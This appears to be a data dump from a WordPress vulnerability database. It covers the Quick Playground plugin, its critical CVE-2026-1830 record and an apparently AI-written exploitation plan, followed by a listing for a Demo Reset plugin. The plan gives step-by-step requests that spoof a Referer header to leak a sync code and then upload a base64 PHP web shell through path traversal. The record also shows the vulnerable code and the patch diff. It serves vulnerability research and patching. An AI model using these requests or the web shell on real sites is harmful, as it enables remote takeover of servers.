[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fFuRnweF6HA2ajMrFntX8neUAb5RAOsexBso_8L5HQUo":3,"$flYOU6C7si-d3H3vx6R7kIBj9pLDRFtfykjXRsp0lIc0":647},{"slug":4,"name":5,"version":6,"author":7,"author_profile":8,"description":9,"short_description":10,"active_installs":11,"downloaded":12,"rating":11,"num_ratings":11,"last_updated":13,"tested_up_to":14,"requires_at_least":15,"requires_php":16,"tags":17,"homepage":22,"download_link":23,"security_score":24,"vuln_count":25,"unpatched_count":11,"last_vuln_date":26,"fetched_at":27,"vulnerabilities":28,"developer":69,"crawl_stats":34,"alternatives":76,"analysis":172,"fingerprints":619},"quick-playground","Quick Playground","1.3.2","davidfcarr","https:\u002F\u002Fprofiles.wordpress.org\u002Fdavidfcarr\u002F","\u003Cp>The Quick Playground plugin provides a safe and convenient way to test new designs and features for your WordPress website, or to create demos and share proposed design changes. It creates a clone of your website’s home page and key content, allowing you to experiment with plugins, themes, and design changes without affecting your live website.\u003C\u002Fp>\n\u003Cp>\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002F2nrRLy6bXZk?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\u003C\u002Fp>\n\u003Cp>The plugin takes advantage of WordPress Playground, the innovative software that simulates a complete PHP\u002FWordPress\u002Fdatabase server environment running in your web browser for testing and experimentation. Quick Playground simplifies the creation of Playground Blueprints, which define steps such as installing themes and plugins and loading content. No need to hand-code JSON or arrange for code to be served from Github.\u003C\u002Fp>\n\u003Cp>This plugin is ideal for developers and designers who want to test new ideas without disrupting their live website.\u003C\u002Fp>\n\u003Cp>Features:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\n\u003Cp>Clone your website’s home page and key content for testing purposes. For performance reasons, the plugin does not attempt to clone your entire database.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Experiment with themes and plugins, including unpublished custom code.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Test new block theme design customizations in a WordPress Playground environment before implementing them on your live site.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Save changes for future playground sessions, allowing you to keep experimenting.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Create demo environments separate from your live website content, for example to showcase themes, plugins, or hosting services.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Sync changes back to your live website. For example, you can prototype block theme changes in Playground and copy the updated templates or template parts back to the live site.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Define pop-up prompts \u002F help tips to be displayed on any front end or admin page within the playground environment.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Works on WordPress multisite (clones the individual site, not the whole network). The multisite network administrator can set default themes and plugins to include or exclude.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Note: some of these features were previously reserved for a “Pro” version but are now available for free. You’re welcome.\u003C\u002Fp>\n\u003Cp>Learn more at \u003Ca href=\"https:\u002F\u002Fquickplayground.com\" rel=\"nofollow ugc\">quickplayground.com\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>Developer Friendly Features\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fdavidfcarr\u002Fquick-playground\" rel=\"nofollow ugc\">Source code on GitHub\u003C\u002Fa>\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fdavidfcarr\u002Fquick-playground\u002Fblob\u002Fmain\u002Ffilters.php\" rel=\"nofollow ugc\">Examples of Using the Filters and Actions\u003C\u002Fa>\u003C\u002Fp>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>How it Works\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\n\u003Cp>You can create multiple Playground profiles, each of which can specify different themes, plugins, playgrounds, content, and settings. The Playground Blueprint is created for you, stored on your server as a PHP associative array, and served to the Playground as JSON file with the same data hierarchy.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>When a Playground is launched, it loads the themes, plugins, and content specified in your BluePrint. Any custom themes and plugins not in the WordPress repository will be archived on your server as ZIP files and downloaded on demand.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Quick Playground loads a copy of itself into the Playground environment and assists with copying over content.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>If you obtain a Pro license key, a plugin with additional capabilities for saving and syncing content will be loaded into the Playground (not your live website).\u003C\u002Fp>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>License\u003C\u002Fh3>\n\u003Cp>This plugin is licensed under the GPLv2 or later. See the \u003Ca href=\"https:\u002F\u002Fwww.gnu.org\u002Flicenses\u002Fgpl-2.0.html\" rel=\"nofollow ugc\">GNU General Public License\u003C\u002Fa> for more details.\u003C\u002Fp>\n\u003Ch3>External services\u003C\u002Fh3>\n\u003Cp>Users may configure Quick Playground to display content from other websites that also run Quick Playground.\u003C\u002Fp>\n","Simplify creation of WordPress Playground test, staging, and demo sites. Specify the theme, plugins and content from the WP admin dashboard.",0,778,"2026-04-07T14:32:00.000Z","6.9.4","6.2","",[18,19,20,21],"demo","playground","staging","testing","https:\u002F\u002Fquickplayground.com","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquick-playground.1.3.2.zip",94,1,"2026-04-08 14:35:08","2026-04-16T10:56:18.058Z",[29],{"id":30,"url_slug":31,"title":32,"description":33,"plugin_slug":4,"theme_slug":34,"affected_versions":35,"patched_in_version":6,"severity":36,"cvss_score":37,"cvss_vector":38,"vuln_type":39,"published_date":26,"updated_date":40,"references":41,"days_to_patch":25,"patch_diff_files":43,"patch_trac_url":34,"research_status":52,"research_verified":53,"research_rounds_completed":54,"research_plan":55,"research_summary":56,"research_vulnerable_code":57,"research_fix_diff":58,"research_exploit_outline":59,"research_model_used":60,"research_started_at":61,"research_completed_at":62,"research_error":34,"poc_status":63,"poc_video_id":34,"poc_summary":16,"poc_steps":64,"poc_tested_at":65,"poc_wp_version":66,"poc_php_version":67,"poc_playwright_script":34,"poc_exploit_code":34,"poc_has_trace":53,"poc_model_used":68,"poc_verification_depth":34},"CVE-2026-1830","quick-playground-missing-authorization-to-unauthenticated-arbitrary-file-upload","Quick Playground \u003C= 1.3.1 - Missing Authorization to Unauthenticated Arbitrary File Upload","The Quick Playground plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.1. This is due to insufficient authorization checks on REST API endpoints that expose a sync code and allow arbitrary file uploads. This makes it possible for unauthenticated attackers to retrieve the sync code, upload PHP files with path traversal, and achieve remote code execution on the server.",null,"\u003C=1.3.1","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Missing Authorization","2026-04-09 03:25:57",[42],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F308cd28a-a477-4bc6-a392-ad5a9eca1cb5?source=api-prod",[44,45,46,47,48,49,50,51],"client-demo-filters.php","client-qckply_data.php","client-save-images.php","client-save-playground.php","expro-api.php","expro-filters.php","expro-quickplayground-sync.php","quick-playground.php","researched",false,3,"# Exploitation Research Plan: Quick Playground \u003C= 1.3.1 Arbitrary File Upload (RCE)\n\n## 1. Vulnerability Summary\nThe **Quick Playground** plugin for WordPress is vulnerable to unauthenticated Remote Code Execution (RCE) via arbitrary file upload in versions up to and including 1.3.1. The vulnerability stems from two issues:\n1. **Information Leak**: REST API endpoints (like `save_settings` or `download_json`) have insufficient authorization checks (e.g., only checking the `Referer` header), allowing unauthenticated attackers to retrieve the `sync_code` required for authenticated operations.\n2. **Arbitrary File Upload with Path Traversal**: The `upload_image` REST API endpoint fails to properly sanitize the `filename` parameter and lacks sufficient authorization. This allows an attacker to upload PHP files and use path traversal (`..\u002F`) to place them in accessible directories.\n\n## 2. Attack Vector Analysis\n- **Endpoints**: \n    - Information Leak: `GET \u002Fwp-json\u002Fquickplayground\u002Fv1\u002Fsave_settings\u002Fdefault` or `GET \u002Fwp-json\u002Fquickplayground\u002Fv1\u002Fdownload_json\u002Fdefault`.\n    - File Upload: `POST \u002Fwp-json\u002Fquickplayground\u002Fv1\u002Fupload_image\u002Fdefault`.\n- **Method**: REST API.\n- **Authentication**: Unauthenticated (authorization bypass via `Referer` spoofing or insufficient checking).\n- **Payload**: JSON body containing a base64 encoded PHP shell and a traversed filename.\n- **Preconditions**: The plugin must be active. A \"profile\" (usually `default`) must exist (created upon plugin activation).\n\n## 3. Code Flow\n1. **Registration**: The plugin registers REST routes in `expro-api.php`.\n2. **Leakage Path**:\n   - `Quick_Playground_Save_Settings::register_routes` (or similar) registers a `GET` method for `save_settings\u002F(?P\u003Cprofile>[a-z0-9_]+)`.\n   - The `permission_callback` likely mimics `Quick_Playground_Sync_Ids::get_items_permissions_check`, which only verifies: `return 'https:\u002F\u002Fplayground.wordpress.net\u002F' == $_SERVER['HTTP_REFERER'];`.\n   - If accessed via `GET`, the callback `get_items` reads the JSON settings file from the uploads directory and returns it.\n   - This JSON contains the `qckply_sync_code` (as seen in `client-save-playground.php` where `$clone['sync_code'] = $qckply_sync_code` is added to the outgoing JSON).\n3. **Upload Path**:\n   - The `upload_image` endpoint is called.\n   - The handler receives `sync_code`, `base64`, and `filename`.\n   - It validates `sync_code` using `qckply_cloning_code($profile)`.\n   - Once authorized, it writes the decoded `base64` content to a path constructed using `filename`.\n   - Because `filename` is not sanitized for path traversal, `..\u002F..\u002Fshell.php` allows writing outside the intended directory.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability **does not require a WordPress nonce**. The REST API endpoints are designed for machine-to-machine communication between a WordPress Playground instance and the host site. Authorization is handled via:\n1. The `Referer` header (for the information leak).\n2. The `sync_code` parameter in the JSON body (for the file upload).\n\n## 5. Exploitation Strategy\n### Step 1: Retrieve the Sync Code\nSpoof the `Referer` header to trick the permission check and retrieve the configuration file for the `default` profile.\n\n- **Request**:\n  - **Tool**: `http_request`\n  - **URL**: `http:\u002F\u002Fvulnerable-site.local\u002Fwp-json\u002Fquickplayground\u002Fv1\u002Fsave_settings\u002Fdefault`\n  - **Method**: `GET`\n  - **Headers**:\n    - `Referer: https:\u002F\u002Fplayground.wordpress.net\u002F`\n- **Expected Response**: A JSON object containing `\"qckply_sync_code\": \"STATED_CODE\"` or similar keys inside the `settings` object.\n\n### Step 2: Upload the PHP Web Shell\nUse the retrieved `sync_code` to authorize a file upload to the `upload_image` endpoint. Use path traversal to place the shell in the `\u002Fwp-content\u002F` directory.\n\n- **Request**:\n  - **Tool**: `http_request`\n  - **URL**: `http:\u002F\u002Fvulnerable-site.local\u002Fwp-json\u002Fquickplayground\u002Fv1\u002Fupload_image\u002Fdefault`\n  - **Method**: `POST`\n  - **Headers**:\n    - `Content-Type: application\u002Fjson`\n    - `Referer: https:\u002F\u002Fplayground.wordpress.net\u002F`\n  - **Body**:\n    ```json\n    {\n      \"sync_code\": \"RETRIEVED_SYNC_CODE\",\n      \"filename\": \"..\u002F..\u002Fpwn.php\",\n      \"base64\": \"PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+\"\n    }\n    ```\n    *(Note: `PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+` is `\u003C?php system($_GET['cmd']); ?>`)*\n\n### Step 3: Trigger Execution\n- **Request**:\n  - **URL**: `http:\u002F\u002Fvulnerable-site.local\u002Fwp-content\u002Fpwn.php?cmd=whoami`\n  - **Method**: `GET`\n\n## 6. Test Data Setup\n1. **Activate Plugin**: Ensure `quick-playground` is active.\n2. **Initialize Settings**: Visit the plugin settings page once as an admin to ensure the `default` profile and `qckply_sync_code` are generated and saved to the filesystem.\n   - CLI: `wp plugin activate quick-playground`\n   - CLI: `wp eval \"qckply_get_directories(); qckply_cloning_code('default');\"` (Forces creation of directories and options).\n\n## 7. Expected","The Quick Playground plugin for WordPress is vulnerable to unauthenticated Remote Code Execution (RCE) due to a combination of an information leak and an insecure file upload endpoint. Attackers can spoof a Referer header to retrieve a synchronization code and subsequently use that code to upload arbitrary PHP files via a path traversal vulnerability in the REST API.","\u002F\u002F expro-api.php ~line 178\npublic function get_items_permissions_check($request) {\n    return 'https:\u002F\u002Fplayground.wordpress.net\u002F' == $_SERVER['HTTP_REFERER'];\n}\n\n---\n\n\u002F\u002F expro-api.php ~line 536\npublic function get_items($request) {\n    \u002F\u002F ... (truncated)\n    $params = $request->get_json_params();\n    $filename = sanitize_text_field($params['filename']);\n    \u002F\u002F ... (truncated)\n    $filedata = base64_decode($params['base64']);\n    $bytes_written = file_put_contents($qckply_site_uploads.'\u002F'.$filename,$filedata);\n    \u002F\u002F ...","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fquick-playground\u002F1.3.1\u002Fexpro-api.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fquick-playground\u002F1.3.2\u002Fexpro-api.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fquick-playground\u002F1.3.1\u002Fexpro-api.php\t2026-02-07 00:44:34.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fquick-playground\u002F1.3.2\u002Fexpro-api.php\t2026-04-07 14:32:44.000000000 +0000\n@@ -536,10 +478,7 @@\n     $qckply_site_uploads_url = $qckply_directories['site_uploads_url'];\n     $params = $request->get_json_params();\n-    $filename = sanitize_text_field($params['filename']);\n+    $filename = empty($params['filename']) ? '' : sanitize_file_name(wp_basename($params['filename']));\n     $last_image = get_transient('qckply_last_image_uploaded');\n     if($last_image == $filename) {\n         $sync_response['message'] = 'duplicate image';\n@@ -556,10 +496,41 @@\n         return $response;\n     }\n     else {\n+      $filedata = base64_decode($params['base64'], true);\n+      $image_info = false;\n+\n+      if(false !== $filedata) {\n+        $image_info = @getimagesizefromstring($filedata);\n+      }\n+\n+      $allowed_mimes = apply_filters('qckply_allowed_upload_mimes', [\n+        'image\u002Fjpeg' => 'jpg',\n+        'image\u002Fpng' => 'png',\n+        'image\u002Fgif' => 'gif',\n+        'image\u002Fwebp' => 'webp',\n+      ]);\n+\n+      if(false === $filedata || empty($image_info['mime']) || empty($allowed_mimes[$image_info['mime']])) {\n+        $sync_response['message'] = 'invalid file type';\n+        return new WP_REST_Response($sync_response, 400);\n+      }","1. Retrieve Sync Code: Send a GET request to \u002Fwp-json\u002Fquickplayground\u002Fv1\u002Fsave_settings\u002Fdefault. Spoof the 'Referer' header to 'https:\u002F\u002Fplayground.wordpress.net\u002F' to bypass the permission check. Extract 'qckply_sync_code' from the JSON response.\n2. Prepare Payload: Create a base64-encoded string of a PHP web shell.\n3. Execute Arbitrary File Upload: Send a POST request to \u002Fwp-json\u002Fquickplayground\u002Fv1\u002Fupload_image\u002Fdefault. In the JSON body, include the retrieved 'sync_code', the base64-encoded payload, and a 'filename' parameter using path traversal (e.g., '..\u002F..\u002Fpwn.php') to escape the restricted uploads directory.\n4. Remote Code Execution: Access the uploaded file at the calculated path (e.g., \u002Fwp-content\u002Fpwn.php) to execute arbitrary PHP commands.","gemini-3-flash-preview","2026-04-16 16:26:25","2026-04-16 16:27:14","failed",[],"2026-04-17 19:16:23","6.7","8.3","claude-opus-4-7",{"slug":7,"display_name":7,"profile_url":8,"plugin_count":70,"total_installs":71,"avg_security_score":72,"avg_patch_time_days":73,"trust_score":74,"computed_at":75},11,490,88,499,71,"2026-04-18T19:25:55.793Z",[77,95,113,132,148],{"slug":78,"name":79,"version":80,"author":81,"author_profile":82,"description":83,"short_description":84,"active_installs":11,"downloaded":85,"rating":86,"num_ratings":25,"last_updated":87,"tested_up_to":14,"requires_at_least":88,"requires_php":89,"tags":90,"homepage":93,"download_link":94,"security_score":86,"vuln_count":11,"unpatched_count":11,"last_vuln_date":34,"fetched_at":27},"demo-reset","Demo Reset – Robust Demo Website Automation","2.0.1","Anjana Hemachandra","https:\u002F\u002Fprofiles.wordpress.org\u002Fanjanahema\u002F","\u003Cblockquote>\n\u003Cp>\u003Cstrong>Build it \u003Cspan aria-hidden=\"true\" class=\"wp-exclude-emoji\">→\u003C\u002Fspan> Freeze it \u003Cspan aria-hidden=\"true\" class=\"wp-exclude-emoji\">→\u003C\u002Fspan> Let them play with it \u003Cspan aria-hidden=\"true\" class=\"wp-exclude-emoji\">→\u003C\u002Fspan> Let it to Auto Reset via Server Cron.\u003C\u002Fstrong>\u003C\u002Fp>\n\u003C\u002Fblockquote>\n\u003Cp>A lightweight plugin built to deliver robust, set-and-forget Demo Automation.\u003C\u002Fp>\n\u003Ch3>Philosophy\u003C\u002Fh3>\n\u003Cp>Your WordPress product can be a Theme, Plugin, or Specially Developed Website. Why limit your customers to frontend-only demos? With Demo Reset Free plugin, they can experience it as an Editor, Author, Subscriber, or any user—without risking permanent changes or security. This is the ultimate set-and-forget automation solution for Demo Websites.\u003C\u002Fp>\n\u003Cp>Stay ahead of your competitors by earning your customers’ trust and confidence with fully accessible Demo Websites on your own servers.\u003C\u002Fp>\n\u003Cp>At Ministry of Plugins we believe, it is our duty to develop WordPress technologies to double your sales.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>EXPLORE THE LIVE DEMO: \u003Ca href=\"https:\u002F\u002Ffree-plugin-demo.demoresetpro.com\u002F\" rel=\"nofollow ugc\">Demo Website link…\u003C\u002Fa>\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Ch3>Concept\u003C\u002Fh3>\n\u003Cp>Simply install the Demo Reset free plugin or Demo Reset Pro plugin on your WordPress website and create a Reset Point to put the site in the Frozen State (Demo Mode). This allows you to let your customers to interact with the website without any risk of permanent changes. With each automatic or manual reset, all customer changes will be removed, restoring the website to its original state. In short; Now your website is ready for Demo purposes.\u003C\u002Fp>\n\u003Cp>See the Concept Diagram: \u003Ca href=\"https:\u002F\u002Fps.w.org\u002Fdemo-reset\u002Fassets\u002Fscreenshot-1.png\" rel=\"nofollow ugc\">Image link…\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>Use Cases of Demo Reset plugin\u003C\u002Fh3>\n\u003Ch4>Demo for sales purposes:\u003C\u002Fh4>\n\u003Cp>Having a Demo Website as part of your sales funnel can significantly boost customer conversions for website developers, theme developers, and plugin developers. It allows potential customers to experience the product firsthand and increasing their confidence of making a purchase. With each manual or automatic reset cycle, the Demo Reset plugin will keep the WordPress website in its original state by removing all temporary changes made by customers.\u003C\u002Fp>\n\u003Ch4>Demo for presentation purposes:\u003C\u002Fh4>\n\u003Cp>For website developers, converting a newly developed WordPress website into a Demo Site is an excellent strategy for presenting its features and functions to stakeholders. After the presentation, the developer can easily reset the website to its original state, erasing any temporary changes. This ensures that the website remains clean and professional. The Demo Reset plugin can be turned off once the presentation is complete.\u003C\u002Fp>\n\u003Ch4>Demo for training purposes:\u003C\u002Fh4>\n\u003Cp>Training the staff and stakeholders on a newly developed WordPress website is more effective when using the website in Demo state. This approach allows trainees to interact with the website and explore its features without the risk of making permanent changes. After the training session, the developer can reset the website to its original state, removing any temporary modifications. This method ensures the site remains pristine and always ready for future use. The Demo Reset plugin can be turned off as needed.\u003C\u002Fp>\n\u003Cp>See the Use Cases Diagram: \u003Ca href=\"https:\u002F\u002Fps.w.org\u002Fdemo-reset\u002Fassets\u002Fscreenshot-2.png\" rel=\"nofollow ugc\">Image link…\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>Demo Reset Free Plugin\u003C\u002Fh3>\n\u003Ch4>Demo Reset Free Plugin – Quick Introduction\u003C\u002Fh4>\n\u003Cp>\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002Fc4Oml--aRwY?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fyoutu.be\u002Fc4Oml--aRwY?si=eTOn6esPHbyJsjQH\" rel=\"nofollow ugc\">YouTube video link…\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch4>Features of Free Plugin:\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Able to create multiple Reset Points.\u003C\u002Fli>\n\u003Cli>Manual Demo Reset execution capability.\u003C\u002Fli>\n\u003Cli>Demo Reset Cycle automation via a regular URL.\u003C\u002Fli>\n\u003Cli>Demo Reset Cycle automation via a RESTful URL.\u003C\u002Fli>\n\u003Cli>The entire Database will reset to the chosen Reset Point.\u003C\u002Fli>\n\u003Cli>All logged-in users will be logged out during the Reset process.\u003C\u002Fli>\n\u003Cli>Displays the Demo Reset Status (THAWED state or FROZEN state) on the WP Admin Bar.\u003C\u002Fli>\n\u003Cli>Media files uploading and deleting is restricted in the FROZEN state. (Images, PDFs etc.)\u003C\u002Fli>\n\u003Cli>Plugins, Themes are WP Core auto updates are restricted, but can update manually in the THAWED state.\u003C\u002Fli>\n\u003Cli>Capable of deploying Demo Websites only for Non-admin users. Because all admins can deactivate the Demo Reset plugin or delete Reset Points.\u003C\u002Fli>\n\u003Cli>Displays the Demo Users’ login details, Live Demo status, and Reset Timer on the Info Bar.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>THAWED state of Free Plugin:\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Changes made by admins or other users will remain on the website.\u003C\u002Fli>\n\u003Cli>Permalink Settings page is accessible.\u003C\u002Fli>\n\u003Cli>All the auto-updates are suspended.\u003C\u002Fli>\n\u003Cli>Admins can install WP Core, Plugin & Theme updates.\u003C\u002Fli>\n\u003Cli>Admins can install or delete Plugins & Themes.\u003C\u002Fli>\n\u003Cli>Admins and users can upload new images or files.\u003C\u002Fli>\n\u003Cli>Admins and users can delete\u002Ftrash existing uploaded images or files.\u003C\u002Fli>\n\u003Cli>Only admins can access the Demo Reset Admin Menu.\u003C\u002Fli>\n\u003Cli>Only admins can change Demo Reset settings.\u003C\u002Fli>\n\u003Cli>Admins must add at least one Reset Point to activate the FROZEN state (Demo Mode).\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>FROZEN state of Free Plugin:\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Changes made by admins or other users will be reset in every Reset Cycle.\u003C\u002Fli>\n\u003Cli>Permalink Settings page is restricted.\u003C\u002Fli>\n\u003Cli>All the auto-updates are suspended.\u003C\u002Fli>\n\u003Cli>Installation of WP Core, Plugin & Theme updates is suspended.\u003C\u002Fli>\n\u003Cli>Installation, activation, deactivation or deletion of Plugins & Themes are suspended.\u003C\u002Fli>\n\u003Cli>New images or files uploading is suspended.\u003C\u002Fli>\n\u003Cli>Deletion of already existing uploaded images or files is suspended.\u003C\u002Fli>\n\u003Cli>Logged-in users will automatically be logged out during the reset process.\u003C\u002Fli>\n\u003Cli>Only admins can access the Demo Reset Admin Menu.\u003C\u002Fli>\n\u003Cli>Only admins can change Demo Reset settings.\u003C\u002Fli>\n\u003Cli>Admins can add multiple Reset Points.\u003C\u002Fli>\n\u003Cli>Admins should delete all Reset Points to get back to the THAWED state.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Setting a WordPress website to FROZEN state (Valid for Free & Pro)\u003C\u002Fh4>\n\u003Cp>\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FQ-ES0ey_0kg?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fyoutu.be\u002FQ-ES0ey_0kg?si=bP2tWv1m_OCVa654\" rel=\"nofollow ugc\">YouTube video link…\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch4>Setting an Active Reset Point for Auto Reset (Valid for Free & Pro)\u003C\u002Fh4>\n\u003Cp>\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002Frbw3ffD7jOM?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fyoutu.be\u002Frbw3ffD7jOM?si=V8se27ZzqLPqqfk5\" rel=\"nofollow ugc\">YouTube video link…\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch4>Setting Reset Runner URL to run Auto Reset (Valid for Free & Pro)\u003C\u002Fh4>\n\u003Cp>\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FS4qRo6vgyAY?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fyoutu.be\u002FS4qRo6vgyAY?si=QNq6TKHmyjYn54Kk\" rel=\"nofollow ugc\">YouTube video link…\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch4>Setting Reset Runner REST URL to run Auto Reset (Valid for Free & Pro)\u003C\u002Fh4>\n\u003Cp>\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FGIJi1zxjGMU?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fyoutu.be\u002FGIJi1zxjGMU?si=5cdp3el-QTREWKrK\" rel=\"nofollow ugc\">YouTube video link…\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch4>Setting a WordPress website back to THAWED state (Valid for Free & Pro)\u003C\u002Fh4>\n\u003Cp>\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002Ftq7wX74X2-s?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fyoutu.be\u002Ftq7wX74X2-s?si=yjEEqCpqG-Sm9xQG\" rel=\"nofollow ugc\">YouTube video link…\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>Demo Reset Documentation: \u003Ca href=\"https:\u002F\u002Fministryofplugins.com\u002Fdemo-reset-docs\" rel=\"nofollow ugc\">https:\u002F\u002Fministryofplugins.com\u002Fdemo-reset-docs\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>Demo Reset Pro Plugin\u003C\u002Fh3>\n\u003Ch4>Demo Reset Pro – Quick Introduction\u003C\u002Fh4>\n\u003Cp>\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FoicwILzz0Yo?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts 